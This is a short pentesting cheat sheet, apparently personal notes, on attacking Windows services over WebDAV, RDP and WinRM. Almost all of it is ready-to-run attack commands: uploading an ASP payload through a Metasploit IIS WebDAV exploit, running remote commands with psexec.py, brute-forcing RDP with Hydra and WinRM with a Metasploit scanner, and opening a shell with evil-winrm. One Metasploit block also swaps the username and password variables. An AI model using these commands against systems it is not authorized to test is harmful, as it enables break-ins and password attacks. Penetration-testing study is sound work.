Windows

Webdav

davtest

  • to scan the webdav..... type in the directory path to the tool :

davtest -url http://$IP/webdav -auth username:password

cadaver

  • to interact with the server (ie. to put,download, etc) files.

cadaver http://$IP/dir #dir = webdav directory 

metasploit

  • exploiting with msfconsole (automating davtest + cadaver)

exploit/windows/iis/iis_webdav_upload_asp 

#note if extension allowed is different this wont work
#only works if asp is executable on the server
# to check what extensions are executable ...... use davtest

set HttpPassword $username
set HttpUsername $password
set RHOSTS $IP
set PATH /webdav_dir/random_name.asp

psexec

psexec.py username@ip <cmd> #cmd.exe

RDP

  • what is rdp?

  • some tricks to pentest

msfconsole

  • to scan if a port is running rdp or not

use auxiliary/scanner/rdp/rdp_scanner

set rhosts $IP
set rport $port
run

hydra

  • bruteforce rdp

hydra -L /path/to/users.txt -P /path/to/wordlists.txt rdp://$IP:$PORT/

xfreerdp

  • connect to rdp port

xfreerdp /u:$username /p:$password /v:$IP:$PORT

Winrm

msfconsole

  • bruteforce winrm

use auxiliary/scanner/winrm/winrm_login

set RHOSTS $IP
set USER_FILE /path/to/users.txt
set PASS_FILE /path/to/passwd.txt

evil-winrm

  • connect & get shell

evil-winrm.rb -u $user -p '$passwd' -i $IP

Last updated